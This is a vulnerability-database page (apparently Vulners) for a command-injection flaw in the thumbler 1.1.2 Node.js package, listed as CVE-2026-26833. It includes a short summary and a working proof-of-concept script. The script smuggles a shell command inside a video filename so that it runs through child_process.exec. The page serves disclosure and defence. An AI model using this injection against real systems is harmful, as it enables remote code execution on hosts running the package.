Lucene search
K

📄 thumbler 1.1.2 Command Injection

🗓️ 27 Apr 2026 00:00:00Reported by indoushkaType 
packetstorm
 packetstorm
🔗 packetstorm.news👁 74 Views

Thumbler 1.1.2 command injection in thumbnail() leads to remote code execution.

Related
Code
ReporterTitlePublishedViews
Family
GithubExploit
Exploit for CVE-2026-26833
24 Mar 202616:15
githubexploit
CNNVD
Thumbler 安全漏洞
25 Mar 202600:00
cnnvd
CVE
CVE-2026-26833
25 Mar 202600:00
cve
Cvelist
CVE-2026-26833
25 Mar 202600:00
cvelist
EUVD
EUVD-2026-15463
25 Mar 202618:31
euvd
Github Security Blog
thumbler allows OS Command Injection
25 Mar 202618:31
github
NVD
CVE-2026-26833
25 Mar 202616:16
nvd
OSV
GHSA-MVHF-547C-H55R thumbler allows OS Command Injection
25 Mar 202618:31
osv
Packet Storm
📄 thumbler 1.1.2 Command Injection
26 Mar 202600:00
packetstorm
Positive Technologies
PT-2026-27802
25 Mar 202600:00
ptsecurity
Rows per page
==================================================================================================================================
    | # Title     : thumbler ≤ 1.1.2 Command Injection in thumbnail() Leading to Remote Code Execution                               |
    | # Author    : indoushka                                                                                                        |
    | # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 147.0.4 (64 bits)                                                 |
    | # Vendor    : https://github.com/mmahrous/thumbler                                                                             |
    ==================================================================================================================================
    
    [+] Summary    : The thumbler package (through version 1.1.2) contains a critical command injection vulnerability in the thumbnail() function. 
                     User-supplied input parameters (input, output, time, size) are concatenated into a single ffmpeg command string and executed via child_process.exec() without proper sanitization.
                     An attacker can inject arbitrary shell commands by crafting malicious input, leading to remote code execution (RCE) on the host system with the privileges of the Node.js process.
    
    
    [+] POC        :  
    
    // exploit.js
    
    const thumbler = require("thumbler");
    
    
    const maliciousCommand = "id > /tmp/pwned.txt"; 
    
    
    const maliciousInput = `test.mp4"; ${maliciousCommand}; echo "`;
    
    const outputPath = "/tmp/output.jpg";
    const options = {
        time: 5,
        size: "100x100"
    };
    
    console.log("[+] Executing command injection via thumbler CVE-2026-26833");
    console.log("[+] Malicious input:", maliciousInput);
    
    thumbler.thumbnail(maliciousInput, outputPath, options, (err, stdout, stderr) => {
        if (err) {
            console.log("[!] Thumbnail generation failed (but command may have executed)");
            console.log("Error:", err.message);
        } else {
            console.log("[+] Thumbnail generated (injection might still work)");
        }
    
        console.log("[*] Check if the command executed by running: cat /tmp/pwned.txt");
    });
    	
    	
    Greetings to :==============================================================================
    jericho * Larry W. Cashdollar * r00t * Yougharta Ghenai * Malvuln (John Page aka hyp3rlinx)|
    ============================================================================================

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

27 Apr 2026 00:00Current
6.8Medium risk
Vulners AI Score6.8
CVSS 3.19.8
EPSS0.02308
SSVC
74